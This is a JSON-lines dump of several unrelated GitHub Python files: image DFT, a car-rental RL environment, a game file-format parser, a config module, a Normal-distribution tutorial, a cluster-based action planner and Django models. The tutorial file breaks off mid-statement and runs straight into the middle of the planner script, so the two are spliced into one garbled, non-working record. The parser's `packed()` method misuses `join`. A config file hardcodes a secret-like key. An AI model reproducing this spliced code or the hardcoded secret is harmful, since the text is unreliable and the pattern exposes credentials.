sys.exit(int(main() or 0))\n","repo_name":"HeleleF/scraper","sub_path":"mfscraper.py","file_name":"mfscraper.py","file_ext":"py","file_size_in_byte":2865,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"53"}
+{"seq_id":"13883801543","text":"# -*- coding: utf-8 -*-\r\n\r\nimport numpy as np\r\nimport cv2\r\nfrom matplotlib import pyplot as plt\r\n\r\n# 画像をグレースケールで読み込む\r\nimg = cv2.imread('/Users/kiyotakoki/dev/com_vis/07_DFT/sakurajima.jpeg',0)\r\n\r\n# DFT\r\ndft = cv2.dft(np.float32(img),flags = cv2.DFT_COMPLEX_OUTPUT)\r\n# 結果をシフト\r\ndft_shift = np.fft.fftshift(dft)\r\n\r\n# 見易いスケールに変換\r\nmagnitude_spectrum = 20*np.log(cv2.magnitude(dft_shift[:,:,0],dft_shift[:,:,1]))\r\n\r\nplt.subplot(121),plt.imshow(img, cmap = 'gray')\r\nplt.title('Input Image'), plt.xticks([]), plt.yticks([])\r\nplt.subplot(122),plt.imshow(magnitude_spectrum, cmap = 'gray')\r\nplt.title('Magnitude Spectrum'), plt.xticks([]), plt.yticks([])\r\nplt.show()\r\n\r\ncv2.imwrite(\"magnitude_spectrum.png\", magnitude_spectrum)\r\n\r\n","repo_name":"kkiyota63/ImageProcessing","sub_path":"07_DFT/07_sample01.py","file_name":"07_sample01.py","file_ext":"py","file_size_in_byte":783,"program_lang":"python","lang":"ja","doc_type":"code","stars":0,"dataset":"github-code","pt":"53"}
+{"seq_id":"470428478","text":"import numpy as np\nimport sys\nimport math\n\nfrom gym.envs.toy_text import discrete\n\ndef clipped_poisson(lam, max_k):\n \"\"\"\n Return poisson PMF clipped at max_k with remaining tail probability\n placed at max_k.\n \"\"\"\n pmf = np.zeros(max_k + 1)\n for k in range(max_k):\n pmf[k] = math.exp(-lam) * lam**k / math.factorial(k)\n pmf[max_k] = 1 - np.sum(pmf)\n \n return pmf \n\n\nclass JackCarRentalEnv(discrete.DiscreteEnv):\n \"\"\" Example 4.2 from Reinforcement Learning: An Introduction by Sutton and Barto.\n \"\"\"\n\n def build_pmfs(self, lambda_request, lambda_return, max_cars):\n \"\"\"\n Return p(new_rentals, returns | initial_cars) as numpy array:\n p[initial_cars, new_rentals, returns]\n \"\"\"\n pmf = np.zeros((max_cars+1, max_cars+1, max_cars+1))\n\n for init_cars in range(max_cars + 1):\n new_rentals_pmf = clipped_poisson(lambda_request, init_cars)\n for new_rentals in range(init_cars + 1):\n max_returns = max_cars - init_cars + new_rentals\n returns_pmf = clipped_poisson(lambda_return, max_returns)\n for returns in range(max_returns + 1):\n p = returns_pmf[returns] * new_rentals_pmf[new_rentals]\n pmf[init_cars, new_rentals, returns] = p\n \n return pmf\n\n def get_transition_model(self, s, a):\n \"\"\"\n Inputs: state as 2-tuple / action as -2,-1,0,1,2 [-max,max]\n Returns a 2-tuple:\n 1. p(s'| s, a) as dictionary:\n keys = s'\n values = p(s' | s, a)\n 2. E(r | s, a, s') as dictionary:\n keys = s'\n values = E(r | s, a, s')\n \"\"\"\n s = (s[0] - a, s[1] + a) # move a cars from loc1 to loc2 \n s = np.clip(s,0,self.max_cars) # impossible actions are cliped to possible states\n\n move_reward = -math.fabs(a) * 2 # ($2) per car moved\n t_prob, expected_r = ([{}, {}], [{}, {}])\n for loc in range(2):\n morning_cars = s[loc]\n rent_return_pmf = self.rent_return_pmf[loc]\n for rents in range(morning_cars + 1):\n max_returns = self.max_cars - morning_cars + rents\n for returns in range(max_returns + 1):\n p = rent_return_pmf[morning_cars, rents, returns]\n if p < 1e-5:\n continue\n s_prime = morning_cars - rents + returns\n r = rents * 10\n t_prob[loc][s_prime] = t_prob[loc].get(s_prime, 0) + p\n expected_r[loc][s_prime] = expected_r[loc].get(s_prime, 0) + p * r\n \n # join probabilities and expectations from loc1 and loc2\n t_model, r_model = ({}, {})\n for s_prime1 in t_prob[0]:\n for s_prime2 in t_prob[1]:\n p1 = t_prob[0][s_prime1] # p(s' | s, a) for loc1\n p2 = t_prob[1][s_prime2] # p(s' | s, a) for loc2\n t_model[(s_prime1, s_prime2)] = p1 * p2\n # expectation of reward calculated using p(s', r | s, a)\n # need to normalize by p(s' | s, a)\n norm_E1 = expected_r[0][s_prime1] / p1\n norm_E2 = expected_r[1][s_prime2] / p2\n\n norm_E1 = 10*round(norm_E1 / 10)\n norm_E2 = 10*round(norm_E2 / 10)\n\n r_model[(s_prime1, s_prime2)] = norm_E1 + norm_E2 + move_reward\n \n return t_model, r_model\n\n\n\n\n\n def __init__(self, max_cars = 4, rents_per_day = (3,4), returns_per_day = (3,2) ):\n \"\"\" The environment is a DiscreteEnv Gym with the following members:\n - nS: number of states\n - nA: number of actions\n - P: transitions (*)\n - isd: initial state distribution (**)\n (*) dictionary dict of dicts of lists, where\n P[s][a] == [(probability, nextstate, reward, done), ...]\n (**) list or array of length nS\n \"\"\"\n\n self.max_cars = max_cars\n self.max_move_cars = int(max_cars / 4)\n self.grid_shape = (max_cars+1,max_cars+1)\n self.rents_per_day = rents_per_day\n self.returns_per_day = returns_per_day\n\n print(\"Initialized JackCarRental 
Environment : %d max_cars %d max_moving cars\"%(max_cars,self.max_move_cars))\n\n nS = np.prod(self.grid_shape)\n nA = len(np.arange(-self.max_move_cars, self.max_move_cars + 1))\n\n # pre-build the rentals/returns pmf for each location\n self.rent_return_pmf = [self.build_pmfs(self.rents_per_day[i], self.returns_per_day[i], max_cars) for i in [0,1] ]\n\n P = {}\n for s_index in range(nS):\n s = np.unravel_index(s_index, self.grid_shape)\n P[s_index] = { a : [] for a in range(nA) }\n\n max_a = min(self.max_move_cars, s[0], max_cars-s[1])\n min_a = max(-self.max_move_cars, -s[1], -(max_cars-s[0]))\n \n for a_real in range(min_a, max_a+1):\n a = a_real + self.max_move_cars\n state_real = np.array(s) + np.array([-a_real, a_real])\n\n t_model, r_model = self.get_transition_model(s, a_real)\n for sp in t_model:\n p = t_model[sp]\n r = r_model[sp]\n sp_index = np.ravel_multi_index(sp,self.grid_shape)\n P[s_index][a].append([p, sp_index, r, False])\n\n isd = np.zeros(nS)\n isd[int(nS/2)] = 1.0\n super(JackCarRentalEnv, self).__init__(nS, nA, P, isd)\n\n def render(self):\n print(\"nothing to render\")\n\n\n","repo_name":"santmarti/SDIC-Code","sub_path":"notebooks/environments/jackcar.py","file_name":"jackcar.py","file_ext":"py","file_size_in_byte":5642,"program_lang":"python","lang":"en","doc_type":"code","stars":2,"dataset":"github-code","pt":"53"}
+{"seq_id":"10131910528","text":"import numpy as np\n\n\nclass LinearGaussianPolicy:\n\n def __init__(self, weights=None, noise=None):\n if weights is not None:\n self.weights = weights\n self.output, self.input = self.weights.shape\n if noise is not None and isinstance(noise, (int, float, complex)):\n noise = np.diag(np.ones(self.output)*noise)\n self.noise = noise\n\n def get_weights(self):\n return self.weights\n\n def set_weights(self, weights, noise=None):\n self.weights = weights\n self.output, self.input = self.weights.shape\n if noise is not None and isinstance(noise, (int, float, complex)):\n noise = np.diag(np.ones(self.output)*noise)\n self.noise = noise\n\n def _add_noise(self):\n noise = np.random.multivariate_normal(np.zeros(self.output), self.noise, 1).T\n return noise\n\n def act(self, X, stochastic=True):\n X = X.reshape(self.input, 1)\n y = np.dot(self.weights, X)\n if self.noise is not None and stochastic:\n y += self._add_noise()\n return y\n\n def step(self, X, stochastic=False):\n return None, self.act(X, stochastic), None, None\n\n def compute_gradients(self, X, y, diag=False):\n X = np.array(X).reshape(self.input, 1)\n y = np.array(y).reshape(self.output, 1)\n mu = np.dot(self.weights, X)\n if diag:\n return np.diag((np.dot(np.linalg.inv(self.noise), np.dot((y - mu), X.T))))\n else:\n return (np.dot(np.linalg.inv(self.noise), np.dot((y - mu), X.T))).flatten()\n","repo_name":"gioramponi/sigma-girl-MIIRL","sub_path":"policies/linear_gaussian_policy.py","file_name":"linear_gaussian_policy.py","file_ext":"py","file_size_in_byte":1568,"program_lang":"python","lang":"en","doc_type":"code","stars":7,"dataset":"github-code","pt":"53"}
+{"seq_id":"38949272652","text":"# Source: http://www.metroid2002.com/retromodding/wiki/HINT_(File_Format)\n\nimport dataclasses\nimport struct\n\nfrom util import unpack_null_terminated_ascii, pack_null_terminated_ascii\n\n__all__ = (\"HintLocation\", \"Hint\", \"HINT\")\n\n\n@dataclasses.dataclass(frozen=True)\nclass HintLocation:\n _struct = struct.Struct(\">IIII\")\n\n world_MLVL_asset_ID: int\n room_MREA_asset_ID: int\n room_index: int\n map_text_STRG_asset_ID: int\n\n @classmethod\n def from_packed(cls, packed: bytes):\n return cls(*cls._struct.unpack(packed))\n\n @property\n def packed_size(self) -> int:\n return 4 + 4 + 4 + 4\n\n def packed(self) -> bytes:\n return self._struct.pack(\n self.world_MLVL_asset_ID,\n self.room_MREA_asset_ID,\n self.room_index,\n self.map_text_STRG_asset_ID,\n )\n\n\n@dataclasses.dataclass(frozen=True)\nclass Hint:\n _struct = struct.Struct(\">ffIII\")\n\n name: str\n immediate_time: float\n normal_time: float\n text_STRG_asset_ID: int\n page_count: int\n location_count: int\n locations: tuple = dataclasses.field(repr=False)\n\n @classmethod\n def from_packed(cls, packed: bytes):\n offset = packed.index(b\"\\x00\") + 1\n name = unpack_null_terminated_ascii(packed[:offset])\n\n immediate_time, normal_time, text_STRG_asset_ID, \\\n page_count, location_count = cls._struct.unpack(packed[offset:offset+20])\n offset += 20\n\n return cls(\n name,\n immediate_time,\n normal_time,\n text_STRG_asset_ID,\n page_count,\n location_count,\n tuple(HintLocation.from_packed(packed[offset + 16*i:offset + 16*(i+1)]) for i in range(location_count)),\n )\n\n @property\n def packed_size(self) -> int:\n return len(self.packed())\n\n def packed(self) -> bytes:\n return b\"\".join((\n pack_null_terminated_ascii(self.name),\n self._struct.pack(\n self.immediate_time,\n self.normal_time,\n self.text_STRG_asset_ID,\n self.page_count,\n self.location_count,\n ),\n *(location.packed() for location in self.locations),\n ))\n\n\n@dataclasses.dataclass(frozen=True)\nclass HINT:\n _struct = struct.Struct(\">III\")\n\n magic: int\n version: int\n hint_count: int\n hints: tuple = dataclasses.field(repr=False)\n\n @classmethod\n def from_packed(cls, packed: bytes):\n magic, version, hint_count = cls._struct.unpack(packed[:12])\n\n offset = 12\n hints = []\n for i in range(hint_count):\n hint = Hint.from_packed(packed[offset:])\n hints.append(hint)\n offset += hint.packed_size\n\n return cls(magic, version, hint_count, tuple(hints))\n\n @property\n def packed_size(self) -> int:\n return len(self.packed())\n\n def packed(self) -> bytes:\n return b\"\".join(\n self._struct.pack(self.magic, self.version, self.hint_count),\n *(hint.packed() for hint in self.hints),\n )\n\n def with_hints_replaced(self, new_hints):\n new_hints = tuple(new_hints)\n return dataclasses.replace(self, hint_count=len(new_hints), hints=new_hints)","repo_name":"SpaghettiToastBook/echoes-patching-library","sub_path":"hint.py","file_name":"hint.py","file_ext":"py","file_size_in_byte":3266,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"53"}
+{"seq_id":"72077204967","text":"import os\nfrom dotenv import load_dotenv\n\nload_dotenv()\n\ndef database_infos_func():\n database_infos = {\n \"app_key\": \"app_key\",\n \"app_secret\": \"33app_secret7f2cb08516d060a37c47243b91d20f\",\n \"codigo_conta_corrente\": \"codigo_conta_corrente\",\n \"estoque_box\": \"estoque_box\",\n \"codigo_local_estoque_galpao\": \"codigo_local_estoque_galpao\",\n \"app_key_parceiro\": os.getenv(\"APP_KEY_PARCEIRO\"),\n \"app_secret_parceiro\": os.getenv(\"APP_SECRET_PARCEIRO\")\n }\n return database_infos","repo_name":"VinicioSales/controladorDeEstoques","sub_path":"config/credenciais/database.py","file_name":"database.py","file_ext":"py","file_size_in_byte":525,"program_lang":"python","lang":"pt","doc_type":"code","stars":0,"dataset":"github-code","pt":"53"}
+{"seq_id":"72870935848","text":"\n\n\"\"\"\nDerivation of the normalizing constant for the standard Normal distribution\n===========================================================================\n\nBelow we illustrate how to derive this constant analytically and and how to\napproximate it by sampling.\n\nAnalytical derivation\n---------------------\n\nThe probability density function of a standard Normal distribution, :math:`f_Z(z)` is\n\n.. math::\n f_Z(z)=\\\\frac{1}{K}\\exp(-\\\\frac{z^2}{2})\n\nBecause :math:`f_Z(z)` is a probability density function, it follows that\n\n.. math::\n 1=\\int_{-\\infty}^\\infty f_Z(z)dz=\\\\frac{1}{K}\\int_{-\\infty}^\\infty\\exp(-\\\\frac{z^2}{2})dz\n\nThen\n\n.. math::\n \\\\begin{align}\n K&=\\int_{-\\infty}^\\infty\\exp(-\\\\frac{z^2}{2})dz\\\\\\\\\n K^2&=\\int_{-\\infty}^\\infty\\int_{-\\infty}^\\infty\\exp(-\\\\frac{x^2}{2})\\exp(-\\\\frac{y^2}{2})dxdy=\\int_{-\\infty}^\\infty\\int_{-\\infty}^\\infty\\exp(-\\\\frac{x^2+y^2}{2}))dxdy\n \\\\end{align}\n\n\nWe now make the change of variables\n\n.. math::\n \\\\begin{align}\n r&=\\sqrt{x^2+y^2}\\\\\\\\\n \\\\theta&=\\\\arctan(\\\\frac{x}{y})\n \\\\end{align}\n\n\nfor which\n\n.. math::\n \\\\begin{align}\n x(r,\\\\theta)&=r\\cos(\\\\theta)\\\\\\\\\n y(r,\\\\theta)&=r\\sin(\\\\theta)\n \\\\end{align}\n\nwith Jacobian\n\n.. math::\n \\\\begin{align}\n J(r,\\\\theta)=\\\\left |\\\\begin{array}{cc}\n \\\\frac{\\\\partial x}{\\\\partial r}(r,\\\\theta)&\\\\frac{\\\\partial x}{\\\\partial \\\\theta}(r,\\\\theta)\\\\\\\\\n \\\\frac{\\\\partial y}{\\\\partial r}(r,\\\\theta)&\\\\frac{\\\\partial y}{\\\\partial \\\\theta}(r,\\\\theta)\n \\\\end{array}\\\\right |\n =\\\\left |\\\\begin{array}{cc}\n \\cos(\\\\theta) & -r\\sin(\\\\theta)\\\\\\\\\n \\sin(\\\\theta) & r\\cos(\\\\theta)\n \\\\end{array}\\\\right |\n =r\\\\cos^2(\\\\theta)+r\\\\sin^2(\\\\theta)=r(\\\\cos^2(\\\\theta)+\\\\sin^2(\\\\theta))=r\n \\\\end{align}\n\nand obtain\n\n.. math::\n \\\\begin{align}\n K^2&=\\int_0^{2\\pi}\\int_0^\\infty\\exp(-\\\\frac{r^2}{2}))|J(r,\\\\theta)|drd\\\\theta=\\int_0^{2\\pi}\\int_0^\\infty\n r\\exp(-\\\\frac{r^2}{2})drd\\\\theta=\\int_0^{2\\pi}\\left(\\left.\\exp(-\\\\frac{r^2}{2}))\\\\right\n |_0^\\infty\\\\right)d\\\\theta\\\\\\\\\n &=\\int_0^{2\\pi}1d\\\\theta=2\\pi\n \\\\end{align}\n\nthen :math:`K=\\sqrt{2\\pi}\\simeq 2.51`.\n\nEstimation by sampling\n----------------------\n\nWe can also estimate :math:`K` by sampling. :math:`K` is the area under the\nfunction :math:`\\\\tilde{f}_Z(z)=\\\\exp(-\\\\frac{z^2}{2})`. To estimate this area\nwe \n\n\n1. enclose most of the function :math:`\\\\tilde{f}_Z(z)` by a box, \n\n2. draw uniformly distributed samples in this box.\n\n3. calculate the proportion of samples below :math:`\\\\tilde{f}_Z(z)`.\n\nNow, the ratio of the area under the function :math:`\\\\tilde{f}_Z(z)`,\n:math:`K`, to the area\nof the enclosing box, :math:`B`, should be similar to the proportion of uniformly distributed\nsamples in the box that fell below function :math:`\\\\tilde{f}_Z(z)`,\n:math:`p\\_under`. 
That is :math:`\\\\frac{K}{B}\\\\simeq p\\_under`, or\n:math:`K\\simeq B\\;p\\_under`.\n\n\"\"\"\n\n#%%\n# Import requirements\n# -------------------\n\nimport numpy as np\nimport plotly.graph_objects as go\n\n\n#%%\n# Define constant\n# ---------------\n\nlower_z = -5.0\nupper_z = 5.0\nn_z = 1000\nn_random = 100000\n\nzs = np.linspace(lower_z, upper_z, n_z)\nf_hat = lambda z: np.exp(-z**2/2)\nf_hat_values = f_hat(zs)\nbox_height = f_hat(0)\nbox = np.ones(n_z)\n\n#%%\n# Sample uniform points in the box\n# --------------------------------\n\nrandom_x = np.random.uniform(low=lower_z, high=upper_z, size=n_random)\nrandom_y = np.random.uniform(low=0, high=1, size=n_random)\n\n#%%\n# Calculate the proportion of samples below unnormalized pdf\n# ----------------------------------------------------------\n\ncount_under = 0\nindices_under = []\nindices_above = []\nfor i in range(n_random):\n if random_y[i] lower_KL_divergance_threshold:\n search_levels_dict[level].append(predicted_probas['Push'])\n # search_KL_divergance[level].append(scipy.stats.entropy(predicted_probas['Push'], goal_proba))\n search_KL_divergance[level].append(scipy.stats.entropy(goal_proba + 1e-10, predicted_probas['Push'] + 1e-10))\n search_action_dict[level].append(copy.deepcopy(search_action_dict[pre_level][proba_index]))\n search_action_dict[level][-1].append('Push')\n\n if mate_predict_kl > lower_KL_divergance_threshold:\n search_levels_dict[level].append(predicted_probas['Mate'])\n # search_KL_divergance[level].append(scipy.stats.entropy(predicted_probas['Mate'], goal_proba))\n search_KL_divergance[level].append(scipy.stats.entropy(goal_proba + 1e-10, predicted_probas['Mate'] + 1e-10))\n search_action_dict[level].append(copy.deepcopy(search_action_dict[pre_level][proba_index]))\n search_action_dict[level][-1].append('Mate')\n\n # print('search_KL_divergance: ', search_KL_divergance)\n # print('search_action_dict: ', search_action_dict)\n # exit()\n\n def insert_queue(KL_action_pair: list, KL_action_queue: list):\n cur_KL_divergances = []\n for pair in KL_action_queue:\n cur_KL_divergances.append(pair[0])\n cur_KL_divergances = np.array(cur_KL_divergances)\n insert_index = np.sum(KL_action_pair[0] > cur_KL_divergances)\n KL_action_queue.insert(insert_index, KL_action_pair)\n\n return\n\n lower_KL_action_queue = []\n higher_KL_action_queue = []\n best_action_pair = None\n\n for i in range(0, search_level):\n\n level = '{}_level'.format(i)\n\n for KL_index, KL_divergance in enumerate(search_KL_divergance[level]):\n\n KL_action_pair = [KL_divergance, search_action_dict[level][KL_index]]\n\n if KL_divergance < lower_KL_divergance_threshold:\n insert_queue(KL_action_pair=KL_action_pair, KL_action_queue=lower_KL_action_queue)\n\n elif KL_divergance < higher_KL_divergance_threshold:\n insert_queue(KL_action_pair=KL_action_pair, KL_action_queue=higher_KL_action_queue)\n\n if not len(lower_KL_action_queue) == 0:\n best_action_pair = lower_KL_action_queue[0]\n break\n\n predicted_probs = []\n\n if best_action_pair is None and not len(higher_KL_action_queue) == 0:\n best_action_pair = higher_KL_action_queue[0]\n\n if len(lower_KL_action_queue) == 0 and len(higher_KL_action_queue) == 0:\n return None, [], [], {}\n\n if len(best_action_pair[1]) == 0:\n return 'End', ['End'], [], {}\n else:\n plan = copy.deepcopy(best_action_pair[1])\n plan_copy = copy.deepcopy(plan)\n while len(plan_copy):\n for key, value in search_action_dict.items():\n if plan_copy in value:\n predicted_probs.append(search_levels_dict[key][value.index(plan_copy)])\n 
plan_copy.pop()\n predicted_probs.reverse()\n plan.append('End')\n\n for index, action in enumerate(plan):\n if action != 'End':\n action_prob_dict[action.lower()] = predicted_probs[index]\n\n return plan[0], plan, predicted_probs, action_prob_dict\n\n\ndef find_end_state_distribution():\n latent_vectors_test = np.load(file_path(file_name=encoded_latent_vectors_npy, file_path=True, split='train'))\n image_labels_test = np.load(file_path(file_name=image_labels_npy, file_path=True, split='train'))\n\n if len(np.unique(image_labels_test)) == 4:\n ending = end_label\n elif len(np.unique(image_labels_test)) == 11:\n ending = end_states\n\n for state in ending:\n vector_index_options = np.where(image_labels_test == state)[0]\n summation = np.zeros((cluster_center_num))\n for index in vector_index_options:\n summation = latent_vec_2_cluster_proba(latent_vectors_test[index, :]) + summation\n\n end_state_distibution = summation / np.sum(summation)\n np.save(file_path(file_name=end_state_distribution_npy, file_path=False, split=None), end_state_distibution)\n return end_state_distibution\n\n\ndef plan_test(end_state_distribution: np.ndarray=None):\n latent_vectors_test = np.load(file_path(file_name=encoded_latent_vectors_npy, file_path=True, split='test'))\n image_labels_test = np.load(file_path(file_name=image_labels_npy, file_path=True, split='test'))\n\n latent_vectors_train = np.load(file_path(file_name=encoded_latent_vectors_npy, file_path=True, split='train'))\n image_labels_train = np.load(file_path(file_name=image_labels_npy, file_path=True, split='train'))\n\n # eval_data_distribution(image_labels_test, latent_vectors_test)\n\n if len(np.unique(image_labels_test)) == 4:\n ending = end_label\n elif len(np.unique(image_labels_test)) == 11:\n ending = end_states\n\n if isinstance(end_state_distribution, np.ndarray):\n goal_proba = end_state_distribution\n\n elif end_state_distribution is None:\n goal_proba = np.load(file_path(file_name=end_state_distribution_npy, file_path=True, split=None))\n\n # goal_proba =np.array([0, 1, 0, 0], dtype=np.float32)\n # print('goal_proba: ', goal_proba)\n # print('latent_vectors_test: ', latent_vectors_test.shape)\n # print('image_labels_test: ', image_labels_test.shape)\n \n average_vectors = {}\n for i in np.unique(image_labels_test):\n i_indices = np.where(image_labels_test == i)[0]\n for index in i_indices:\n # print('latent_vec_2_cluster_proba(latent_vectors_test[i_indices, :]): ', latent_vec_2_cluster_proba(latent_vectors_test[i_indices, :]).shape)\n proba = latent_vec_2_cluster_proba(latent_vectors_test[index, :]).reshape(-1, 4)\n # print('proba: ', proba)\n # exit()\n if i in list(average_vectors.keys()):\n average_vectors[i] += proba\n else:\n average_vectors[i] = proba\n average_vectors[i] /= len(i_indices)\n np.set_printoptions(precision=3, suppress=True)\n # print('test average_vectors: ', average_vectors)\n\n average_vectors = {}\n for i in np.unique(image_labels_train):\n i_indices = np.where(image_labels_train == i)[0]\n for index in i_indices:\n # print('latent_vec_2_cluster_proba(latent_vectors_test[i_indices, :]): ', latent_vec_2_cluster_proba(latent_vectors_test[i_indices, :]).shape)\n proba = latent_vec_2_cluster_proba(latent_vectors_train[index, :]).reshape(-1, 4)\n # print('proba: ', proba)\n # exit()\n if i in list(average_vectors.keys()):\n average_vectors[i] += proba\n else:\n average_vectors[i] = proba\n average_vectors[i] /= len(i_indices)\n np.set_printoptions(precision=3, suppress=True)\n # print('train average_vectors: ', 
average_vectors)\n\n # exit()\n\n success_num = 0\n first_success_num = 0\n test_num = 330\n tested_indices = []\n\n sequences_test_num = {}\n sequences_test_success_num = {}\n sequences_test_first_success_num = {}\n\n bar = Bar('Processing', max=test_num)\n for _ in range(test_num):\n while True:\n rand_index = np.random.randint(latent_vectors_test.shape[0])\n\n initial_label = image_labels_test[rand_index]\n cur_label = copy.deepcopy(initial_label)\n # if not cur_label == 3:\n # continue\n\n cur_latent_vector = latent_vectors_test[rand_index, :]\n\n if not rand_index in tested_indices:\n break\n tested_indices.append(rand_index)\n\n Groundtruth_plan = groundtruth_plan[action_type[initial_label]]\n initial_plan = None\n executed_plan = []\n if not action_type[initial_label] in list(sequences_test_num.keys()):\n sequences_test_num[action_type[initial_label]] = 1\n sequences_test_success_num[action_type[initial_label]] = 0\n sequences_test_first_success_num[action_type[initial_label]] = 0\n\n sequences_test_num[action_type[initial_label]] += 1\n\n loop_times = 0\n while True:\n proba = latent_vec_2_cluster_proba(cur_latent_vector)\n # test = search_plan(init_proba=proba, goal_proba=goal_proba)\n # print(len(test))\n predicted_action, plan, _, _ = search_plan(init_proba=proba, goal_proba=goal_proba)\n # print('cur_label: ', list(action_type.values())[int(cur_label)])\n # print('plan: ', plan)\n # print('#'*50)\n\n if not plan is None and initial_plan is None:\n initial_plan = copy.deepcopy(plan)\n if not predicted_action is None:\n executed_plan.append(predicted_action)\n\n if predicted_action == 'End' or predicted_action is None:\n break\n\n cur_label, cur_latent_vector = simulate_action(cur_label=cur_label,\n action=predicted_action,\n latent_vectors=latent_vectors_test,\n image_labels=image_labels_test)\n loop_times += 1\n if loop_times > 5:\n break\n # exit()\n # print('executed_plan: ', executed_plan)\n # print('initial_plan: ', initial_plan)\n # print('Groundtruth_plan: ', Groundtruth_plan)\n # exit()\n\n if initial_plan == executed_plan and initial_plan in Groundtruth_plan:\n sequences_test_first_success_num[action_type[initial_label]] += 1\n first_success_num += 1\n\n if cur_label in ending and not predicted_action is None:\n sequences_test_success_num[action_type[initial_label]] += 1\n success_num += 1\n bar.next()\n bar.finish()\n print('success rate: ', success_num / test_num)\n print('first success rate: ', first_success_num / test_num)\n print('#' * 50)\n for key, value in sequences_test_num.items():\n print('value: ', value)\n test_num_temp = value\n test_success_num_temp = sequences_test_success_num[key]\n test_first_success_num_temp = sequences_test_first_success_num[key]\n\n print('test num: ', value)\n print('success num: ', test_success_num_temp)\n print('first success num: ', test_first_success_num_temp)\n\n print('{} success rate: '.format(key), test_success_num_temp / test_num_temp)\n print('{} first success rate: '.format(key), test_first_success_num_temp / test_num_temp)\n\n return plan\n\n\ndef simulate_action(cur_label, action, latent_vectors, image_labels):\n\n Dynamic = {'Push': Push_dynamic, 'Mate': Mate_dynamic}\n next_labels = np.where(Dynamic[action][int(cur_label), :] == 1)[0]\n\n vector_index_options = np.where(image_labels == next_labels)[0]\n rand_vector_index = np.random.choice(vector_index_options)\n next_label = image_labels[rand_vector_index]\n next_laten_vector = latent_vectors[rand_vector_index, :]\n\n return next_label, next_laten_vector\n\n\ndef 
predict_proba(init_proba: np.ndarray):\n\n assert init_proba.shape[0] == cluster_center_num\n\n A = np.zeros((label_num, label_num))\n A_push = np.zeros((label_num, label_num))\n A_mate = np.zeros((label_num, label_num))\n A_self = np.eye(label_num)\n\n for push in Push:\n A[push[0], push[1]] = 1\n A_push[push[0], push[1]] = 1\n\n for mate in Mate:\n A[mate[0], mate[1]] = 1\n A_mate[mate[0], mate[1]] = 1\n\n for self_ in Self:\n A[self_[0], self_[1]] = 1\n for self_ in Push_self:\n A_push[self_[0], self_[1]] = 1\n for self_ in Mate_self:\n A_mate[self_[0], self_[1]] = 1\n\n A = normalize(A, axis=1, norm='l1')\n A_push = normalize(A_push, axis=1, norm='l1')\n A_mate = normalize(A_mate, axis=1, norm='l1')\n # print('A_push: ', np.where(A_push==1))\n # print('A_mate: ', np.where(A_mate==1))\n\n\n init_cluster_prob = init_proba\n\n init_cluster_prob /= np.sum(init_cluster_prob)\n\n P = np.zeros((cluster_center_num, cluster_center_num))\n\n P_purity_num = np.load(file_path(file_name=label_nums_npy, file_path=True, split=None))\n P_purity_num = P_purity_num.astype(int)\n\n P_purity_col_norm = normalize(P_purity_num, axis=0, norm='l1')\n P_purity_row_norm = normalize(P_purity_num, axis=1, norm='l1')\n np.set_printoptions(precision=3, suppress=True)\n # print('P_purity_col_norm: ', P_purity_col_norm)\n # print('P_purity_row_norm: ', P_purity_row_norm)\n # print('P_purity_num: ', P_purity_num)\n\n action_prob = {'Push': 0, 'Mate': 0}\n P_push = np.zeros((cluster_center_num, cluster_center_num))\n P_mate = np.zeros((cluster_center_num, cluster_center_num))\n\n for i in range(P.shape[0]):\n for j in range(P.shape[1]):\n P_entry = 0\n\n P_entry_push = 0\n P_entry_mate = 0\n for m in range(P_purity_row_norm.shape[1]):\n for n in range(P_purity_row_norm.shape[1]):\n P_entry += P_purity_row_norm[i, m] * A[m, n] * P_purity_col_norm[j, n]\n\n P_entry_push += P_purity_row_norm[i, m] * A_push[m, n] * P_purity_col_norm[j, n]\n P_entry_mate += P_purity_row_norm[i, m] * A_mate[m, n] * P_purity_col_norm[j, n]\n\n P[i, j] = P_entry\n\n P_push[i, j] = P_entry_push\n P_mate[i, j] = P_entry_mate\n\n P_succesor = init_cluster_prob @ P\n\n P_succesor_mate = init_cluster_prob @ P_mate\n P_succesor_push = init_cluster_prob @ P_push\n\n # print('P: ', P)\n # print('#'*25)\n # print('P_mate: ', P_mate)\n # print('P_push: ', P_push)\n # print('P_self: ', P_self)\n\n # print('init_cluster_prob: ', init_cluster_prob)\n # print('P_succesor: ', P_succesor)\n # print('P_succesor_mate: ', P_succesor_mate)\n # print('P_succesor_push: ', P_succesor_push)\n # print('P_succesor_self: ', P_succesor_self)\n\n # print('P_succesor_mate: ', np.sum(P_succesor_mate))\n # print('P_succesor_push: ', np.sum(P_succesor_push))\n # print('P_succesor_self: ', np.sum(P_succesor_self))\n\n # # print('sum: ', P_succesor_mate+P_succesor_push+P_succesor_self)\n\n # print('P_succesor: ', np.sum(P_succesor))\n # print('#' * 50)\n # exit()\n\n return {'Push': P_succesor_push, 'Mate': P_succesor_mate}\n\n\nif __name__ == '__main__':\n end_state_distribution = find_end_state_distribution()\n plan = plan_test(end_state_distribution=None)\n print('plan: ', plan)","repo_name":"mingchen-sjtu/NeuralSymbol_AI","sub_path":"src/fmauch_universal_robot/ur_real_robot/VAE_detect/plan.py","file_name":"plan.py","file_ext":"py","file_size_in_byte":16758,"program_lang":"python","lang":"en","doc_type":"code","stars":2,"dataset":"github-code","pt":"53"}
+{"seq_id":"10592973902","text":"from django.db import models\n\nclass ArmyShop(models.Model):\n year = models.IntegerField()\n month = models.IntegerField()\n type = models.TextField()\n name = models.TextField()\n\n class Meta:\n db_table = 'army_shop'\n managed = False\n\n# 1. 클래스\n# 2. 모델 상속\n# 3. 속성 => 변수 = OOOField 대입\nclass Course(models.Model):\n # Integer BigInteger\n name = models.CharField(max_length=30)\n cnt = models.IntegerField()","repo_name":"ggoreb/tutorial_aivle","sub_path":"secondapp/models.py","file_name":"models.py","file_ext":"py","file_size_in_byte":461,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"53"}
